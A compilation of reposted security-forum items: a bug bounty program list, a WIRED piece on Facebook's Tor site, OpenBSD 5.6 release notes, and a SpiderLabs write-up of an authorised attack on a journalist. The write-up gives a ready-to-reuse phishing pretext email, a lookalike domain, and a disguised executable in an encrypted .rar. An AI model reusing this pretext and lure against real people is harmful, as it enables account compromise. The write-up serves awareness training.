[/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Splitwise [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] Spotify [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Sprout Social [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Square [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward swag] [TD] StatusPage.io [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Sunrise [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Symantec [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Tagged [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Tapatalk [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Tarsnap [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Team Unify [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Tele2 [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Telegram [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: 
hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Tesla [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] The Humble Bundle [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Trade Only [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Tresorit [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Tuenti [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Tumblr [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Twilio [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Twitch [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Twitter [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Typo3 [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Uber [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Unitag [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] UPC [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active 
fame] [TD] Valve Software [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] VCE [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Venmo [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Viadeo [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Vodafone (Netherlands) [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Volcanic Pixels [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Volusion [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] VSR [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Wamba [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Webconverger [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward swag] [TD] Websecurify [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] WHMCS [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Windthorst ISD [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] X.commerce [/TD] [TD=class: new] [/TD] [TD=class: reward] 
[/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Xen [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Xmarks [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] XMind [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Yahoo [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Yandex [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Yesware [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] YouTube [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Zencash [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] Zendesk [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Zetetic [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Ziggo [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Zimbra [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Zynga [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes[/TD] [/TR] 
[/TABLE] Sursa: https://bugcrowd.com/list-of-bug-bounty-programs
-
Why Facebook Just Launched Its Own ‘Dark Web’ Site
By Andy Greenberg 10.31.14 | 12:31 pm

Facebook has never had much of a reputation for letting users hide their identities online. But now the world’s least anonymous website has just joined the Web’s most anonymous network.

In a first-of-its-kind move for a Silicon Valley giant, Facebook on Friday launched a Tor hidden service, a version of its website that runs the anonymity software Tor. That new site, which can only be accessed by users running the Tor software, bounces users’ connections through three extra encrypted hops to random computers around the Internet, making it far harder for any network spy observing that traffic to trace their origin.

Inviting users to connect to Facebook over Tor may seem like a strange move; given that Facebook still requires you to log in and doesn’t allow pseudonyms (in most cases), even Tor users on the site are hardly anonymous to Facebook itself. But even so, Tor users on Facebook can now protect their identities from every other online snoop that would want to unmask them.

“No, you’re not anonymous to Facebook when you log in, but this provides a huge benefit for users who want security and privacy,” says Runa Sandvik, a former Tor developer who Facebook credits with advising the project in a blog post. “You get around the censorship and local adversarial surveillance, and it adds another layer of security on top of your connection.”

Tor, after all, doesn’t just let users hide their identities from the sites they visit, anonymously buying drugs on the Silk Road or uploading leaked documents to news sites through the leak platform SecureDrop. It’s also designed to circumvent censorship and surveillance that occurs much closer to the user’s own connection, such as in repressive regimes like Iran or China. And since Facebook uses SSL encryption, no surveillance system watching either Facebook’s connection or the user’s local traffic should be able to match up a user’s identity with their Facebook activity.

Until now, Facebook has made it difficult for users to access its site over Tor, sometimes even blocking their connections. Because Tor users appear to log in from unusual IP addresses all over the world, they often trigger the site’s safeguards against botnets, collections of hijacked computers typically used by hackers to attack sites.

[Photo: Facebook security engineer Alec Muffett. Doc Searls / Flickr]

“Tor challenges some assumptions of Facebook’s security mechanisms—for example its design means that from the perspective of our systems a person who appears to be connecting from Australia at one moment may the next appear to be in Sweden or Canada,” writes Facebook security engineer Alec Muffett. “Considerations like these have not always been reflected in Facebook’s security infrastructure, which has sometimes led to unnecessary hurdles for people who connect to Facebook using Tor.”

Facebook’s Tor site is designed to be friendlier to those far-flung connections. And Sandvik says it also provides an extra layer of security beyond what running Tor on the user’s end alone can provide. Tor users are often warned about malicious “exit nodes,” the final computer bouncing their traffic around the Internet. Such exit nodes can sometimes be used to spy on their unencrypted traffic or, in some cases, even strip that encryption away. When both the user and Facebook are running Tor, however, the traffic doesn’t leave the Tor network until it’s safely within Facebook’s infrastructure.

Over the past few years, sites like Google, Facebook, and Twitter have all implemented default SSL encryption to protect users’ traffic. Sandvik sees Facebook’s Tor hidden service as a sign that Tor may be the next basic privacy protection Silicon Valley companies will be expected to offer their users. “I would be really excited to see other tech companies that want to do the same,” she says. “And I’d love to help them.”

Source: Why Facebook Just Launched Its Own 'Dark Web' Site | WIRED
-
Hacking a Reporter: UK Edition

Over the summer, a U.K. journalist asked the Trustwave SpiderLabs team to target her with an online attack. You might remember that we did the same in 2013 by setting our sights on a U.S.-based reporter. This scenario, however, would differ from the first. The reporter, Sophie, was our only target. Co-workers, company or family were off limits. Sophie wrote about the experience from her perspective here. Below, we’ll tell the story from the perspective of Trustwave SpiderLabs, playing the role of “theoretical” attacker.

Online, some readers criticized Sophie for being too naïve when it came to the attack. There could be some truth to that, but we would say that with great pretext a well-executed attack rarely fails, no matter the target (and zero-days are rarely required). We’re not saying this out of pride or to take it easy on Sophie. It’s just our experience.

To hedge against the risk of failure, we proposed a two-to-three stage attack. We described the first stage as a demonstration of passive information gathering and later stages only as "more active". At a high level, we approached the project as follows:

Stages of activity:
1. Passive information gathering/reconnaissance
2. Active fingerprinting
3. Active attack

First, we performed reconnaissance on Sophie and identified her potential cellphone model, her corporate e-mail address, some of her social network profiles and much more. This was a good starting point, but to increase the chance of success it helps greatly to know what operating system the target uses and to fingerprint her system(s) as much as possible.

Fingerprinting: First Attempt

In our first attempt to fingerprint her, we created a Gmail account using a fake, Latin name (we’ll explain why later). From that account, we sent a few e-mails to Sophie asking whether we could meet her. We included a hidden image in an attempt to fingerprint her system when it loaded the image. The e-mail was purposefully vague about the details of any in-person meet because people tend to be curious, and we expected Sophie to reply asking for more details and consequently open additional attack vectors. We never received a response or a proper fingerprint, because Gmail prevented it: Google’s image proxy downloaded the images.

Fingerprinting: Second Attempt

As part of our second fingerprinting attempt, we registered a domain that resembled the LinkedIn domain—“linkedhn.com.” We sent an e-mail to Sophie that mimicked the one sent by LinkedIn when a user invites you to connect. We sent the e-mail masquerading as a supposed colleague of Sophie’s. If she chose to confirm the connection, the message would lead Sophie to the login page for our cloned LinkedIn website. Sophie opened our counterfeit invite but did not log in. We were, however, able to fingerprint the target system using the BeEF framework. We enumerated her plugins, OS version, location, and much more. In short, we identified that Windows 7 with Java 1.7 update 51 and Microsoft Office 2010 were in use. We then quickly lost our browser hook and no further attacks were launched. Although seemingly small, this first victory was important. Blind attacks—when not launched against massive groups of potential targets—are unlikely to succeed against a single individual. Below you see some of the system information we were able to gather.

After allowing some time to elapse, we revived our fake Gmail account that used a Latin name. We used it to introduce ourselves and lend more credibility to our subsequent pretext. We created a new account called "UK.Leaks.Team@gmail.com" and sent the following, fictitious e-mail to our target three days before Brazil’s presidential election.

Sophie,

We are part of a Worldwide activist group and write to you again as one of our local collaborators tried to contact you a few weeks ago using the alias Ricardo Almeida to protect his identity, but unfortunately you haven’t replied. We want to talk to you because we have obtained confidential files from the UK government and are currently working with newspapers from different countries. At the time of writing we already have agreements with national newspapers from the USA, Germany, Italy, France, Brazil, Argentina and South Africa. The document in reference must be released on October 3rd, 2014; two days before the Brazilian Election Day. …

We would like to invite The [REDACTED] to be a primary channel for public disclosure of this document and attach a partial extract for your initial review. If you agree to publish an article in accordance with our coordinated global release date of October 3rd, we will send the full document and related files for your review. Please be aware we are a not-for-profit group and our identities must remain private to protect individuals involved.

Viewing Instructions

The attached file is compressed and encrypted with a strong password "![REDACTED]Curtis7482" (without quotes), in order to reduce the file size and increase the security of our communication. If you are using Windows you may need to copy the attached .rar file outside Outlook to be able to open it since the file is encrypted, as follows:

You will need a tool to extract .rar files, for example WinRAR, 7Z, etc. The steps below are based on WinRAR.
1. Copy the attached file to your "Documents" folder.
2. On the "Documents" folder, right click on "UK Leaks Proof – [REDACTED].rar", choose "extract here" and insert the password.
3. A new file will be created called "UK Leak #12 - BR Voting System.pdf", which can be double clicked to open.

We hope you find the extract enlightening and are waiting for your answer.

Sincerely.
UK Leaks Team

The contents of this message are confidential and may be privileged. Copying or disclosing is prohibited.

Guess what? She opened the e-mail and followed the instructions. Originally she hesitated, but it seems her appetite for a scoop overwhelmed her reluctance. Put yourself in her place. She is a journalist for a big newspaper, and she’s contacted by a supposed anonymous leaker with ground-breaking news about electoral fraud. What would you do? You probably wouldn’t let security best practice get in the way of a potential exclusive! Maybe you’d think twice, but you might also put faith in your antivirus program and have a look at the attachment. Here’s the e-mail displayed on her computer:

Her use of the webmail interface caught our attention. Later, we discovered that she seemed to be using a different computer, as the fingerprint in this case differed from the original. We used an old trick to impersonate the binary and make it look like a valid PDF file. Because Gmail prohibits sending a direct executable, usually we hide it inside a .zip file. Gmail also blocked the .zip file, so in the end we were forced to use something less common. We chose to use a .rar file and adapt the pretext to it. We hypothesized that since Sophie was a technology journalist, she might already have WinRAR installed. Below is how the fake PDF file appeared to Sophie on her computer once she followed the instructions:

It looks like a genuine attachment, right? A clue that reveals something might be amiss is its description as “application” in the “type” column. Many people might ignore it, but it’s worth checking that description to avoid such social engineering hacks. Another feature we added was that every time the fake PDF was opened, it paused for a few seconds and displayed a pop-up message stating “Access was denied.” We hoped this might lead to her double-clicking the file again or trying to open it using another computer. It worked! As a result we got 6 different connections and shells from her laptop.

We packed the executable with a private packer that at the time had a very low rate of detection. The payload is a variation of the 3 in 1 described in this blog post. At one point she replied to our e-mail agreeing to the release date and saying she planned to open the file immediately. As you’ll see below, warnings from security software on her system raised her suspicions. But in spite of her reservations, the pressure of the release date, the potential for a scoop that could affect her career in a positive way, and her confidence in her security software led to the compromise of her system.

After her original reply, it took her another 25 minutes to execute the file. We think this might have been a symptom of her trepidation. We delayed our response to let the pressure and phony urgency work their magic. Once she sent her second response expressing her concerns that it was a scam, it was too late—she was already compromised. But had this particular attack failed, her asking us for proof would have given us a second chance to try another attack vector. We think she may be thinking to herself, "Did I just do something I shouldn't have?!"

As we showed you earlier, Sophie was using the Gmail web interface with Chrome. She also had OpenOffice, which is less common. The computer was not running with elevated privileges, but as you know, there are ways to escalate privileges even on a fully patched computer (but that’s a topic for another blog post). Once we established command and control on her system, there wasn’t anything we couldn't have done. We did consider one of the most interesting avenues to be piggy-backing onto the corporate VPN connection, stealing credentials, and then exploring the file-shares and other resources used by Sophie and potentially her colleagues. The sky was the limit.

What can we take away from this?

Organizations should consider the following:
- Raise awareness and educate employees on the potential perils of social engineering attacks.
- Review gaps in perimeter anti-malware defenses (particularly e-mail and web gateways). If security gateway technology is already in place, be sure it’s configured to be effective and that it’s tested.
- Regular patching and updating of systems and software is not just for servers. Patching end-user systems and software should be a structured, on-going activity.
- Understand that the compromise of a user laptop can lead to pivoted attacks against the internal corporate network, even if the compromised user is working from home. For example, attackers could pivot through any corporate VPN connections that are, or will be, established by that remote user.

As a footnote to this post, it’s worth mentioning that we often get asked, “what’s the point of social engineering, you’re always going to get in”. To be fair, that is a pretty accurate statement. The value of social engineering engagements comes partly from testing resilience, but more so from raising employee awareness of what is possible when they are targeted.

Posted by SpiderLabs Anterior on 28 October 2014
Source: Hacking a Reporter: UK Edition - SpiderLabs Anterior
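The post's attachment trick (an executable carrying a document-looking name, delivered inside a .rar to get past gateway filters that already block .exe and .zip) is exactly the kind of mismatch a mail gateway or a cautious reader can check mechanically. The following is an added example, not Trustwave's or the original post's code: it compares each attachment's claimed extension against its leading bytes and flags executable content under a document name, double extensions, and archive containers whose members need the same check. The file names are modelled on the e-mail above; the header bytes are constructed.

```python
"""Triage e-mail attachments whose name says 'document' but whose bytes say 'program'."""
from __future__ import annotations

# Leading bytes (magic numbers) of the formats that matter here.
PE_MAGIC = b"MZ"            # Windows executables (.exe/.scr/...) start with "MZ"
PDF_MAGIC = b"%PDF-"
RAR_MAGIC = b"Rar!\x1a\x07"

DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "rtf", "txt"}
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "msi", "js", "vbs"}
ARCHIVE_EXTS = {"rar", "zip", "7z"}


def extension_chain(name: str) -> list[str]:
    """All dotted suffixes, lower-cased: 'invoice.pdf.exe' -> ['pdf', 'exe']."""
    parts = name.lower().split(".")
    return parts[1:] if len(parts) > 1 else []


def sniff_type(head: bytes) -> str:
    """Classify a file by its leading bytes, ignoring the file name entirely."""
    if head.startswith(PE_MAGIC):
        return "pe"
    if head.startswith(PDF_MAGIC):
        return "pdf"
    if head.startswith(RAR_MAGIC):
        return "rar"
    return "unknown"


def assess_attachment(name: str, head: bytes) -> list[str]:
    """Return the findings for one attachment (an empty list means nothing odd)."""
    findings = []
    exts = extension_chain(name)
    last = exts[-1] if exts else ""
    kind = sniff_type(head)

    if last in EXECUTABLE_EXTS:
        findings.append("executable-extension")
        if any(e in DOCUMENT_EXTS for e in exts[:-1]):
            findings.append("double-extension")          # e.g. 'report.pdf.exe'
    elif kind == "pe":
        # The case the Explorer "Type" column reported as "Application":
        # a PE image whose name does not end in an executable extension.
        findings.append("executable-content-under-document-name")

    if kind == "rar" or last in ARCHIVE_EXTS:
        # An archive (possibly password-protected, as in the pretext above)
        # has to be opened and each member run through this same check.
        findings.append("archive-container")
    return findings


def triage(attachments) -> dict:
    """Map each (name, leading bytes) pair to its list of findings."""
    return {name: assess_attachment(name, head) for name, head in attachments}


# Constructed samples: names modelled on the e-mail above, header bytes invented.
SAMPLES = [
    ("UK Leak #12 - BR Voting System.pdf", b"MZ\x90\x00\x03\x00\x00\x00"),
    ("quarterly-report.pdf", b"%PDF-1.5\n%\xe2\xe3\xcf\xd3"),
    ("invoice.pdf.exe", b"MZ\x90\x00\x03\x00\x00\x00"),
    ("UK Leaks Proof.rar", b"Rar!\x1a\x07\x01\x00"),
]

if __name__ == "__main__":
    for name, findings in triage(SAMPLES).items():
        print(f"{name!r}: {findings or 'clean'}")
```

The check reads only the first few bytes of each file, so it can run on a gateway before any attachment reaches a mailbox; a password-protected archive is reported as a container precisely because its members cannot be inspected until it is opened.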
-
[h=2]OpenBSD 5.6[/h] Released Nov 1, 2014 Copyright 1997-2014, Theo de Raadt. ISBN 978-0-9881561-4-2 5.6 Song: "Ride of the Valkyries" Order a CDROM from our ordering system. See the information on the FTP page for a list of mirror machines. Go to the pub/OpenBSD/5.6/ directory on one of the mirror sites. Have a look at the 5.6 errata page for a list of bugs and workarounds. See a detailed log of changes between the 5.5 and 5.6 releases. signify(1) pubkeys for this release: base: RWR0EANmo9nqhpPbPUZDIBcRtrVcRwQxZ8UKGWY8Ui4RHi229KFL84wV fw: RWT4e3jpYgSeLYs62aDsUkcvHR7+so5S/Fz/++B859j61rfNVcQTRxMw pkg: RWSPEf7Vpp2j0PTDG+eLs5L700nlqBFzEcSmHuv3ypVUEOYwso+UucXb All applicable copyrights and credits can be found in the applicable file sources found in the files src.tar.gz, sys.tar.gz, xenocara.tar.gz, or in the files fetched via ports.tar.gz. The distribution files used to build packages from the ports.tar.gz file are not included on the CDROM because of lack of space. [h=3]What's New[/h] This is a partial list of new features and systems included in OpenBSD 5.6. For a comprehensive list, see the changelog leading to 5.6. LibreSSL This release forks OpenSSL into LibreSSL, a version of the TLS/crypto stack with goals of modernizing the codebase, improving security, and applying best practice development processes. No support for legacy MacOS, Netware, OS/2, VMS and Windows platforms, as well as antique compilers. Removal of the IBM 4758, Broadcom ubsec, Sureware, Nuron, GOST, GMP, CSwift, CHIL, CAPI, Atalla and AEP engines, either because the hardware is irrelevant, or because they require external non-free libraries to work. No support for FIPS-140 compliance. No EBCDIC support. No support for big-endian i386 and amd64 platforms. Use standard routines from the C library (malloc, strdup, snprintf...) instead of rolling our own, sometimes badly. Remove the old OpenSSL PRNG, and rely upon arc4random_buf from libc for all the entropy needs. 
Remove the MD2 and SEED algorithms. Remove J-PAKE, PSK and SRP (mis)features. Aggressive cleaning of BN memory when no longer used. No support for Kerberos. No support for SSLv2. No support for the questionable DTLS heartbeat extension. No support for TLS compression. No support for US-Export SSL ciphers. Do not use the current time as a random seed in libssl. Support for ChaCha and Poly1305 algorithm. Support for Brainpool and ANSSI elliptic curves. Support for AES-GCM and ChaCha20-Poly1305 AEAD modes. [*]Improved hardware support, including: SCSI Multipathing support via mpath(4) and associated path drivers on several architectures. New qlw(4) driver for QLogic ISP SCSI HBAs. New qla(4) driver for QLogic ISP2100/2200/2300 Fibre Channel HBAs. New upd(4) sensor driver for USB Power Devices (UPS). New brswphy(4) driver for Broadcom BCM53xx 10/100/1000TX Ethernet PHYs. New uscom(4) driver for simple USB serial adapters. New axen(4) driver for ASIX Electronics AX88179 10/100/Gigabit USB Ethernet devices. The inteldrm(4) and radeondrm(4) drivers have improved suspend/resume support. The userland interface for the agp(4) driver has been removed. The rtsx(4) driver now supports card readers based on the RTS5227 and RTL8402 chipsets. The firmware for the run(4) driver has been updated to version 0.33. The run(4) driver now supports devices based on the RT3900E chipset. The zyd(4) driver, which was broken for some time, has been fixed. The bwi(4) driver now works in systems with more than 1GB of RAM. The re(4) driver now supports devices based on the RTL8168EP/8111EP, RTL8168G/8111G, and RTL8168GU/8111GU chipsets. [*]Generic network stack improvements: divert(4) now supports checksum offload. IPv6 is now turned off on new interfaces by default. Assigning an IPv6 address will enable IPv6 on an interface. Support for RFC4620 IPv6 Node Information Queries has been removed. The kernel no longer supports the SO_DONTROUTE socket option. 
  [*]The getaddrinfo(3) function now supports the AI_ADDRCONFIG flag defined in RFC 3493.
  [*]Include router alert option (RAO) in IGMP packets, as required by RFC2236.
  [*]ALTQ has been removed.
  [*]The hash tables for Protocol Control Blocks (PCB) of TCP and UDP now resize automatically on load.
[*]Installer improvements:
  [*]Remove ftp and tape as install methods.
  [*]Preserve the disklabel (and next 6 blocks) when installing boot block on 4k-sector disk drives.
  [*]Change the "Server?" question to "HTTP Server?" to allow unambiguous autoinstall(8) handling.
  [*]Allow autoinstall(8) to fetch and install sets from multiple locations.
  [*]Many sample configuration files have moved from /etc to /etc/examples.
[*]Routing daemons and other userland network improvements:
  [*]When used with the -v flag, tcpdump(8) now shows the actual bad checksum within the IP/protocol header itself and what the good checksum should be.
  [*]ftp(1) now allows its User-Agent to be changed via the -U command-line option.
  [*]The -r option of ping(8) and traceroute(8) has been removed.
  [*]ifconfig(8) can now explicitly assign an IPv6 link-local address and turn IPv6 autoconf on or off.
  [*]ifconfig(8) has been made smarter about parsing WEP keys on the command line.
  [*]ifconfig(8) scan now shows the encryption type of wireless networks (WEP, WPA, WPA2, 802.1x).
  [*]MS-CHAPv1 (RFC2433) support has been removed from pppd(8).
  [*]traceroute6(8) has been merged into traceroute(8).
  [*]The asr API for asynchronous address resolution and nameserver querying is now public.
  [*]pflow(4)'s pflowproto 9 has been removed.
  [*]The userland ppp(8) daemon and its associated PPPoE helper, pppoe(8), have been removed.
  [*]snmpd(8), snmpctl(8), and relayd(8) now communicate via the AgentX protocol.
  [*]relayd(8) has a new filtering subsystem, where the new configuration language uses last-matching pf-like rules.
  [*]The new relayd(8) filter rules now support URL-based relaying.
  [*]relayd(8) now uses privilege separation for private keys.
  This acts as an additional mitigation to prevent leakage of the private keys from the processes doing SSL/TLS.
  [*]New httpd(8) HTTP server with FastCGI and SSL support.
[*]OpenSMTPD 5.4.3 (includes changes to 5.4.2):
  New/changed features:
  [*]OpenSMTPD replaces Sendmail as the default MTA.
  [*]Queue process now runs under a different user for better isolation.
  [*]Merged MDA, MTA and SMTP processes into a single unprivileged process.
  [*]Killed the MFA process, it is no longer needed.
  [*]Added support for email address lookups in the table_db backend.
  [*]Added RSA privilege separation support to prevent possible private key leakage.
  The following significant bugs have been fixed in this release:
  [*]Minor bug fixes in some corner cases of the routing logic.
  [*]The enqueuer no longer adds its own User-Agent.
  [*]Disabled profiling code, allowing all processes to rest rather than waking up every second.
  [*]Reworked the purge task to avoid disk-hits unless necessary... only once at startup.
  [*]Fix various header parsing bugs in the local enqueuer.
  [*]Assorted minor fixes and code cleanups.
[*]Security improvements:
  [*]Changed the heuristics of the stack protector to also protect functions with local array definitions and references to local frame addresses. This matches the -fstack-protector-strong option of upstream GCC.
  [*]Position-independent executables (PIE) are now used by default on powerpc.
  [*]Removed Kerberos.
  [*]Default bcrypt hash type is now $2b$.
  [*]Remove md5crypt support.
  [*]An improved, easier to use bcrypt API is now available.
  [*]Increase randomness of random mmap mappings.
  [*]Added getentropy(2).
  [*]Added timingsafe_memcmp(3).
  [*]Removed the MD4 hash algorithm and functions from cksum(1), S/Key, and libc.
  [*]gets(3) has been removed.
  [*]Added reallocarray(3), which allows multiple sized objects to be allocated without the cost of clearing memory while avoiding possible integer overflows.
  [*]Extended fread(3) and fwrite(3) to check for integer overflows.
[*]Assorted improvements:
  [*]locate databases for both base and xenocara, as /usr/lib/locate/src.db and /usr/X11R6/lib/locate/xorg.db.
  [*]Much faster package updates, due to package contents reordering that precludes re-downloading unchanged files.
  [*]Fix many programs that failed when accessing disks having sector sizes other than 512 bytes, including badsect(8), df(1), dump(8), dumpfs(8), fsck_ext2fs(8), fsck_ffs(8), fsdb(8), growfs(8), ncheck_ffs(8), quotacheck(8), tunefs(8).
  [*]Constrain MSDOS timestamps to 1/1/1980 through 12/31/2107. 64-bit time_t values outside that range are stored as 1/1/1980.
  [*]bs(6) now prints a battleship splash screen.
  [*]rcp, rsh, rshd, rwho, rwhod, ruptime, asa, bdes, fpr, mkstr, page, spray, xstr, oldrdist, fsplit, uyap, and bluetooth have been removed.
  [*]rmail(8) and uucpd(8) have been removed from the base system and added to the ports tree.
  [*]Lynx has been removed from the base system and added to the ports tree.
  [*]TCP Wrappers have been removed.
  [*]Fix atexit(3) recursive handlers.
  [*]Enhance disklabel(8) to recover filesystem mountpoint information when reading saved ascii labels.
  [*]Properly handle msgbuf_write(3) EOF conditions, including uses in tmux(1), dvmrpd(8), ldapd(8), ldpd(8), ospf6d(8), ospfd(8), relayd(8), ripd(8), smtpd(8), ypldap(8).
